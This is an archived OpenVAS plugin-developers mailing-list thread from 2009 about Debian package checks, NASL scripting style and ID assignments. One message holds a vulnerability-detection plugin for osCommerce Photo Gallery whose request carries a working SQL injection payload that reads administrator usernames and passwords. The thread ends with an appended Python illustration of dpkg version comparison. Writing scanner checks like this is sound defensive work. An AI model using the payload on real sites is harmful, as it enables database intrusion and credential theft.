From timb at nth-dimension.org.uk Mon Feb 2 01:28:22 2009
From: timb at nth-dimension.org.uk (Tim Brown)
Date: Mon, 2 Feb 2009 00:28:22 +0000
Subject: [Openvas-plugins] [Openvas-discuss] Question about plugin 11808
In-Reply-To:
References: <5792267e0901191508y1c1fe4fbg47e682f6909a6d6@mail.gmail.com>
Message-ID: <200902020028.24304.timb@nth-dimension.org.uk>

The problem with this plugin is that it checks for the vulnerability by
fingerprinting the service (not by checking that the patch has been
applied). There are a number of other scanners out there which also check
for this issue but without substantial testing I'm not sure if we can
improve the check.

Tim
-- 
Tim Brown

From bchandra at secpod.com Fri Feb 6 07:30:50 2009
From: bchandra at secpod.com (Chandrashekhar B)
Date: Fri, 6 Feb 2009 12:00:50 +0530
Subject: [Openvas-plugins] [Openvas-discuss] Question about plugin 11808
In-Reply-To: <200902020028.24304.timb@nth-dimension.org.uk>
References: <5792267e0901191508y1c1fe4fbg47e682f6909a6d6@mail.gmail.com>
        <200902020028.24304.timb@nth-dimension.org.uk>
Message-ID: <40437D3EA10D4587A653A0CF946063FC@bchandra>

-----Original Message-----
From: Tim Brown [mailto:timb at nth-dimension.org.uk]
Sent: Monday, February 02, 2009 5:58 AM
To: openvas-plugins at wald.intevation.org
Cc: Chandrashekhar B; 'Eric Gearhart'
Subject: Re: [Openvas-plugins] [Openvas-discuss] Question about plugin 11808

> The problem with this plugin is that it checks for the vulnerability by
> fingerprinting the service (not by checking that the patch has been
> applied).

Updated this plugin to check for the latest MS bulletins that superseded it.

> There are a number of other scanners out there which also check for this
> issue but without substantial testing I'm not sure if we can improve the
> check.

Thanks,
Chandra.
From jan-oliver.wagner at intevation.de Fri Feb 13 23:00:46 2009
From: jan-oliver.wagner at intevation.de (Jan-Oliver Wagner)
Date: Fri, 13 Feb 2009 23:00:46 +0100
Subject: [Openvas-plugins] Improving gather-packages-list.nasl
Message-ID: <200902132300.47132.jan-oliver.wagner@intevation.de>

Hello,

I've spent some time with gather-packages-list.nasl and I think it could
be improved in some ways:

* In case a "/etc/debian_version" is found on the target system, but
  the contents are not matched, then a confusing note is issued:
    "System identifier unknown: "', uname, ' ..."
  So, the uname. Although it is already clear that it is a Debian.
  This could allow for short-cuts, avoiding unnecessary comparisons.

* Instead of e.g.
    rls = ssh_cmd(socket:sock, cmd:"cat /etc/debian_version");
  wouldn't it be better to apply
    rls = ssh_cmd(socket:sock, cmd:"[ -f /etc/debian_version ] && cat /etc/debian_version");
  and then check for empty strings to avoid unnecessary comparisons?

* For DSAs there are quite formal elements like
    For the testing (lenny) distribution these problems have been fixed in version 1.8.2.dfsg-3+lenny1.
    For the unstable (sid) distribution these problems have been fixed in version 1.8.2.dfsg-4.
  It would be absolutely great if these tests could be added as many people
  use "almost-stable" releases already in production mode.
  Sid support would be great as well.

Any thoughts?

Best

Jan

-- 
Dr. Jan-Oliver Wagner | ++49-541-335 08 30 | http://www.intevation.de/
Intevation GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 18998
Managing Directors: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner

From jan-oliver.wagner at intevation.de Fri Feb 13 23:52:12 2009
From: jan-oliver.wagner at intevation.de (Jan-Oliver Wagner)
Date: Fri, 13 Feb 2009 23:52:12 +0100
Subject: [Openvas-plugins] Improving pkg-lib-deb.inc
Message-ID: <200902132352.12532.jan-oliver.wagner@intevation.de>

Hi,

the method "isdpkgvuln" is typically used several times by a local security check.
In case "ssh/login/release" is not the one being sought, shouldn't it be
possible to avoid further tests on this?

Best

Jan

-- 
Dr. Jan-Oliver Wagner | ++49-541-335 08 30 | http://www.intevation.de/
Intevation GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 18998
Managing Directors: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner

From jan-oliver.wagner at intevation.de Sat Feb 14 00:03:32 2009
From: jan-oliver.wagner at intevation.de (Jan-Oliver Wagner)
Date: Sat, 14 Feb 2009 00:03:32 +0100
Subject: [Openvas-plugins] exit(0) at end useless?
Message-ID: <200902140003.32723.jan-oliver.wagner@intevation.de>

Hi,

I wonder whether it isn't useless to have an exit(0) at the end of scripts as
it is the same as just ending the script. At least over 60 NVTs do so.

Any opinions?

Best

Jan

-- 
Dr. Jan-Oliver Wagner | ++49-541-335 08 30 | http://www.intevation.de/
Intevation GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 18998
Managing Directors: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner

From eric at nixwizard.net Sat Feb 14 00:11:16 2009
From: eric at nixwizard.net (Eric Gearhart)
Date: Fri, 13 Feb 2009 16:11:16 -0700
Subject: [Openvas-plugins] exit(0) at end useless?
In-Reply-To: <200902140003.32723.jan-oliver.wagner@intevation.de>
References: <200902140003.32723.jan-oliver.wagner@intevation.de>
Message-ID: <5792267e0902131511u425c4cfbva3a5f9d91df85e4@mail.gmail.com>

On Fri, Feb 13, 2009 at 4:03 PM, Jan-Oliver Wagner wrote:
> Hi,
>
> I wonder whether it isn't useless to have an exit(0) at the end of scripts as
> it is the same as just ending the script. At least over 60 NVTs do so.
>
> Any opinions?

I thought exit(0) was "good form" in scripts... it basically explicitly
states "exit cleanly, with no errorlevel state"

http://www.hsrl.rutgers.edu/ug/shell_help.html looks pretty accurate...
see the "Exit status" section:

"All Unix utilities should return an exit status... A non-zero exit status
indicates an error condition of some sort while a zero exit status indicates
things worked as expected."

-- 
Eric
http://nixwizard.net

From lists at securityspace.com Sat Feb 14 02:59:39 2009
From: lists at securityspace.com (Thomas Reinke)
Date: Fri, 13 Feb 2009 20:59:39 -0500
Subject: [Openvas-plugins] Improving pkg-lib-deb.inc
In-Reply-To: <200902132352.12532.jan-oliver.wagner@intevation.de>
References: <200902132352.12532.jan-oliver.wagner@intevation.de>
Message-ID: <4996258B.4010904@securityspace.com>

No doubt there are more efficient ways of handling this. (You have to
remember though, a given test may include checks for multiple releases.)

One could, however, wrap within the main body of the LSC all checks for a
given release in an if-then block so that it was only executed if the host
was identified as running that release.

Better yet (and probably easier to do, and somewhat more clean while
limiting changes), would be to tag a given distribution's LSCs with a
unique kb entry (a simple boolean, within gather-package-list.nasl) and
make the entire script have a "script_require_keys(' that the daemon won't
even launch the script if the distribution doesn't match. (Now that I think
of it, I'm embarrassed that we didn't do that earlier.)

> Hi,
>
> the method "isdpkgvuln" is typically used several times by a local security check.
> In case "ssh/login/release" is not the one being sought, shouldn't it be possible to avoid further tests on this?
>
> Best
>
> Jan

From lists at securityspace.com Sat Feb 14 03:00:44 2009
From: lists at securityspace.com (Thomas Reinke)
Date: Fri, 13 Feb 2009 21:00:44 -0500
Subject: [Openvas-plugins] Improving gather-packages-list.nasl
In-Reply-To: <200902132300.47132.jan-oliver.wagner@intevation.de>
References: <200902132300.47132.jan-oliver.wagner@intevation.de>
Message-ID: <499625CC.90103@securityspace.com>

Jan-Oliver Wagner wrote:
> Hello,
>
> I've spent some time with gather-packages-list.nasl and I think it could
> be improved in some ways:

I've tried to minimize my time in there, and it shows :(

> * In case a "/etc/debian_version" is found on the target system, but
>   the contents are not matched, then a confusing note is issued:
>     "System identifier unknown: "', uname, ' ..."
>   So, the uname. Although it is already clear that it is a Debian.
>   This could allow for short-cuts, avoiding unnecessary comparisons.

Yup.

> * Instead of e.g.
>     rls = ssh_cmd(socket:sock, cmd:"cat /etc/debian_version");
>   wouldn't it be better to apply
>     rls = ssh_cmd(socket:sock, cmd:"[ -f /etc/debian_version ] && cat /etc/debian_version");
>   and then check for empty strings to avoid unnecessary comparisons?

Yup.

> * For DSAs there are quite formal elements like
>     For the testing (lenny) distribution these problems have been fixed in version 1.8.2.dfsg-3+lenny1.
>     For the unstable (sid) distribution these problems have been fixed in version 1.8.2.dfsg-4.
>   It would be absolutely great if these tests could be added as many people
>   use "almost-stable" releases already in production mode.
>   Sid support would be great as well.
>
> Any thoughts?

This one is a bit tougher, and I'll have to admit we haven't taken a real
close look at it. My concern would be to offer coverage of a release, but
find out that the coverage is incomplete. Things like bugs that aren't
fixed timely (because the distribution isn't considered production ready
by the release team).
Or bugs that are fixed, but advisories aren't issued (we could go straight
to the repositories, but then wouldn't be able to determine the difference
between a bug fix and a security fix).

To be honest, I won't quibble with people using lenny (in fact, we do
because it is _relatively_ stable and offered great virtualization support
via kvm.) BUT BUT BUT - I don't feel guilty in not offering security checks
for a release that the release team very clearly is indicating is not
production quality and is not being maintained to production quality
standards for security issues.

Just my $0.02 worth.

Thomas

From michael.wiegand at intevation.de Mon Feb 16 08:56:36 2009
From: michael.wiegand at intevation.de (Michael Wiegand)
Date: Mon, 16 Feb 2009 08:56:36 +0100
Subject: [Openvas-plugins] Improving pkg-lib-deb.inc
In-Reply-To: <4996258B.4010904@securityspace.com>
References: <200902132352.12532.jan-oliver.wagner@intevation.de>
        <4996258B.4010904@securityspace.com>
Message-ID: <20090216075636.GA14767@intevation.de>

* Thomas Reinke [14. Feb 2009]:
> Better yet (and probably easier to do, and somewhat more clean while
> limiting changes), would be to tag a given distribution's LSCs with
> a unique kb entry (a simple boolean, within gather-package-list.nasl)
> and make the entire script have a
> "script_require_keys(' that the daemon won't even launch the script if the distribution
> doesn't match. (Now that I think of it, I'm embarrassed that we
> didn't do that earlier.)

Yes, I think this is a good idea. We could set a key like
"ssh/login/distribution/debian".

It might also be worth considering splitting OS/distro detection and
package gathering. The information regarding the remote OS/distro might be
useful for other NVTs/LSCs as well, even if they don't gather package
information. This separation would allow for a more generalized OS
detection and could possibly use information gathered by nmap or similar
tools in the future.
It would also make gather-package-list a lot leaner since it would not have
to bother with doing OS detection itself. The only downside I can think of
is that this might require an additional ssh connection.

What do you think, would this be useful?

Regards,

Michael

-- 
Michael Wiegand | OpenPGP key: D7D049EC | http://www.intevation.de/
Intevation GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 18998
Managing Directors: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner

From michael.wiegand at intevation.de Mon Feb 16 09:37:16 2009
From: michael.wiegand at intevation.de (Michael Wiegand)
Date: Mon, 16 Feb 2009 09:37:16 +0100
Subject: [Openvas-plugins] exit(0) at end useless?
In-Reply-To: <200902140003.32723.jan-oliver.wagner@intevation.de>
References: <200902140003.32723.jan-oliver.wagner@intevation.de>
Message-ID: <20090216083716.GB14767@intevation.de>

* Jan-Oliver Wagner [14. Feb 2009]:
> Hi,
>
> I wonder whether it isn't useless to have an exit(0) at the end of scripts as
> it is the same as just ending the script. At least over 60 NVTs do so.

Looking at the code (nasl_do_exit in openvas-libnasl/nasl/nasl_misc_funcs.c)
I would guess it does not make a difference aside from explicitly setting
the return value to 0. But as Eric said, I think it would be good style for
the NASL scripts to use the return value to let the world know what happened
to them even if they don't find anything newsworthy. Even an exit(0) would
be good if it signified "NVT ran okay, did not find a vulnerability".
Regards,

Michael

-- 
Michael Wiegand | OpenPGP key: D7D049EC | http://www.intevation.de/
Intevation GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 18998
Managing Directors: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner

From meyer at strato-rz.de Thu Feb 19 12:43:05 2009
From: meyer at strato-rz.de (Michael Meyer)
Date: Thu, 19 Feb 2009 12:43:05 +0100
Subject: [Openvas-plugins] [Plugin] osCommerce Photo Gallery SQL Injection Vulnerability
Message-ID: <20090219114305.GA3605@m2.homelinux.org>

Hi,

Photo Gallery for osCommerce is prone to an SQL Injection vulnerability in
gallery_process.php. This plugin will detect this issue.

This is my first plugin. Therefore, it could be that there are better ways
to make it.

script_id has to be filled...

Micha

-------------- next part --------------
###############################################################################
# OpenVAS Vulnerability Test
# $Id$
#
# osCommerce Photo Gallery SQL-Injection Detection
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
  script_id();
  script_version ("1.0");
  script_name(english:"osCommerce Photo Gallery SQL Injection Vulnerability");
  desc["english"] = "

  Overview:
  This host is running Photo Gallery for osCommerce which is prone to an SQL
  Injection vulnerability in gallery_process.php.

  Vulnerability Insight:
  Input passed to the parameters in gallery_process.php is not properly
  sanitised before being used in the SQL queries.

  Impact:
  Successful exploitation will allow the attacker to access the whole
  database.

  Affected Software/OS:
  Photo Gallery (http://oscommerce-photo-gallery.micrographx.be) <= version 0.6

  Solution:
  Edit gallery_process.php and change all occurrences of $_GET['cID'] to
  (int)$_GET['cID'] and all occurrences of $_GET['pID'] to (int)$_GET['pID'].
  Then, at the top of gallery_process.php, search for:

    require('includes/application_top.php');
    require(DIR_WS_LANGUAGES . $language . '/gallery_user.php');

  and change to:

    require('includes/application_top.php');
    if (!tep_session_is_registered('customer_id')) {
      tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
    }
    require(DIR_WS_LANGUAGES . $language .
    '/gallery_user.php');

  Risk factor : Medium";

  script_description(english:desc["english"]);
  script_summary(english:"Determine if Photo Gallery for osCommerce is vulnerable to SQL Injection");
  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
  script_dependencie("find_service.nes", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
if(!can_host_php(port:port)) exit(0);

# Candidate install directories: common osCommerce paths plus whatever the
# CGI directory enumeration already found.
dir = make_list("/catalog","/osc","/shop",cgi_dirs());

foreach d (dir)
{
  # Inject a UNION SELECT through pID; an unpatched gallery_process.php passes
  # the parameter straight into its query.
  url = string(d, "/gallery_process.php?edit=yes&pID=0%20union%20select%20user_name%20as%20title,%20user_password%20as%20description%20from%20administrators%20&cID=0");
  req = http_get(item:url, port:port);
  buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
  if( buf == NULL ) continue;   # no answer for this directory, try the next one

  # Two signs of a vulnerable target: the injected SQL is echoed back (usually
  # inside a database error message), or the query ran and the database
  # complained that the 'administrators' table is missing, which old versions
  # of osCommerce don't have. The first pattern also fires if the raw
  # parameter is merely reflected into the page, so a hit deserves a manual
  # look at the response.
  if(egrep(pattern:".*union select user_name as title, user_password as description from administrators.*", string: buf) ||
     egrep(pattern:".*Table.*administrators.*doesn't exist.*", string: buf))
  {
    security_warning(port:port);
    exit(0);
  }
}

From michael.wiegand at intevation.de Mon Feb 23 12:48:03 2009
From: michael.wiegand at intevation.de (Michael Wiegand)
Date: Mon, 23 Feb 2009 12:48:03 +0100
Subject: [Openvas-plugins] ID block 100NNN assigned to Michael Meyer (mime)
Message-ID: <20090223114802.GA14147@intevation.de>

Hello,

For your information: I have assigned the ID block 100NNN to Michael Meyer
(mime on IRC) since he has already contributed an NVT and plans to
contribute additional NVTs. AFAICT, this block was empty beforehand and
this assignment does not conflict with existing NVTs. I have updated
http://www.openvas.org/openvas-oids.html accordingly.
Please let me know if you have any questions or suggestions regarding my
assignment.

Regards,

Michael

-- 
Michael Wiegand | OpenPGP key: D7D049EC | http://www.intevation.de/
Intevation GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 18998
Managing Directors: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner

From michael.wiegand at intevation.de Tue Feb 24 14:29:53 2009
From: michael.wiegand at intevation.de (Michael Wiegand)
Date: Tue, 24 Feb 2009 14:29:53 +0100
Subject: [Openvas-plugins] ID block 101NNN assigned to Christian Eric Edjenguele
Message-ID: <20090224132953.GE16112@intevation.de>

Hello,

For your information: I have assigned the ID block 101NNN to Christian Eric
Edjenguele since he is planning to contribute NVTs. AFAICT, this block was
empty beforehand and this assignment does not conflict with existing NVTs.
I have updated http://www.openvas.org/openvas-oids.html accordingly.

Please let me know if you have any questions or suggestions regarding my
assignment.

Regards,

Michael

-- 
Michael Wiegand | OpenPGP key: D7D049EC | http://www.intevation.de/
Intevation GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 18998
Managing Directors: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner
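Editor's added example for the pkg-lib-deb.inc thread above (Jan's question about isdpkgvuln being called several times, and the DSA fixed-version strings like 1.8.2.dfsg-3+lenny1 versus 1.8.2.dfsg-4). A Debian local security check has to get two things right: skip the package comparisons entirely when the target's "ssh/login/release" is not the release the check was written for, and compare installed against fixed versions with dpkg's ordering rules rather than a plain string compare. The Python below is written for this page and is not code from OpenVAS, pkg-lib-deb.inc or dpkg; the knowledge-base layout, the "DEB5.0" release label, the dpkg -l style package lines and the isdpkgvuln_like function's signature are all assumptions made for the illustration.

```python
DIGITS = set("0123456789")

def _order(c: str) -> int:
    # dpkg character weights: digits and end-of-string are 0, letters their ASCII
    # value, '~' sorts before everything, other punctuation after letters.
    if c == "" or c in DIGITS:
        return 0
    if c.isalpha():
        return ord(c)
    if c == "~":
        return -1
    return ord(c) + 256

def _verrevcmp(a: str, b: str) -> int:
    # One upstream or revision fragment, compared the way dpkg does it:
    # alternate a lexical pass over non-digit runs with a numeric pass over
    # digit runs. Negative means a < b, positive a > b.
    i = j = 0
    la, lb = len(a), len(b)
    while i < la or j < lb:
        first_diff = 0
        while (i < la and a[i] not in DIGITS) or (j < lb and b[j] not in DIGITS):
            ac = _order(a[i]) if i < la else 0
            bc = _order(b[j]) if j < lb else 0
            if ac != bc:
                return ac - bc
            i += 1
            j += 1
        # Numeric pass: skip leading zeros, the longer digit run wins, otherwise
        # the first differing digit decides.
        while i < la and a[i] == "0":
            i += 1
        while j < lb and b[j] == "0":
            j += 1
        while i < la and j < lb and a[i] in DIGITS and b[j] in DIGITS:
            if not first_diff:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if i < la and a[i] in DIGITS:
            return 1
        if j < lb and b[j] in DIGITS:
            return -1
        if first_diff:
            return first_diff
    return 0

def parse_version(version: str):
    # [epoch:]upstream[-revision]; a missing epoch is 0 and a missing revision
    # is "" (which compares equal to "0", as Debian policy requires).
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    upstream, sep, revision = version.rpartition("-")
    if not sep:
        upstream, revision = version, ""
    return epoch, upstream, revision

def compare_versions(a: str, b: str) -> int:
    # Full dpkg ordering: epoch, then upstream, then revision. Returns -1/0/1.
    ea, ua, ra = parse_version(a)
    eb, ub, rb = parse_version(b)
    if ea != eb:
        return 1 if ea > eb else -1
    rc = _verrevcmp(ua, ub) or _verrevcmp(ra, rb)
    return (rc > 0) - (rc < 0)

# Constructed stand-in for what the SSH gathering step leaves in the scanner's
# knowledge base (not real scanner output; "DEB5.0" and the dpkg -l style
# lines are assumed formats).
SAMPLE_KB = {
    "ssh/login/release": "DEB5.0",
    "ssh/login/packages": (
        "ii  openssl      0.9.8g-15+lenny1  Secure Socket Layer (SSL) binary\n"
        "ii  libssl0.9.8  0.9.8g-15+lenny1  SSL shared libraries\n"
    ),
}

def installed_version(kb: dict, pkg: str):
    # Installed ('ii') version of pkg from dpkg -l style lines, or None.
    for line in kb.get("ssh/login/packages", "").splitlines():
        fields = line.split()
        if len(fields) >= 3 and fields[0] == "ii" and fields[1] == pkg:
            return fields[2]
    return None

def isdpkgvuln_like(kb: dict, pkg: str, fixed: str, rls: str):
    # Stand-in (assumed signature, not the real isdpkgvuln) for the decision a
    # per-package check in a Debian LSC makes: None when the target is another
    # release or lacks the package (nothing to test, which is Jan's short-cut),
    # otherwise whether installed < fixed under dpkg ordering.
    if kb.get("ssh/login/release") != rls:
        return None
    installed = installed_version(kb, pkg)
    if installed is None:
        return None
    return compare_versions(installed, fixed) < 0
```

The release test comes first and is cheap, so a check written for several releases can call it once per release and never touch the package list for the others; Thomas's script_require_keys gating moves that same decision up into the scanner so the script is not launched at all. The version comparison is where string compares go wrong: "1.10" sorts after "1.9", "1.0~rc1" sorts before "1.0", and "3+lenny1" sorts after "3" but before "4", which is exactly the lenny-before-sid ordering the two DSA lines in the thread rely on.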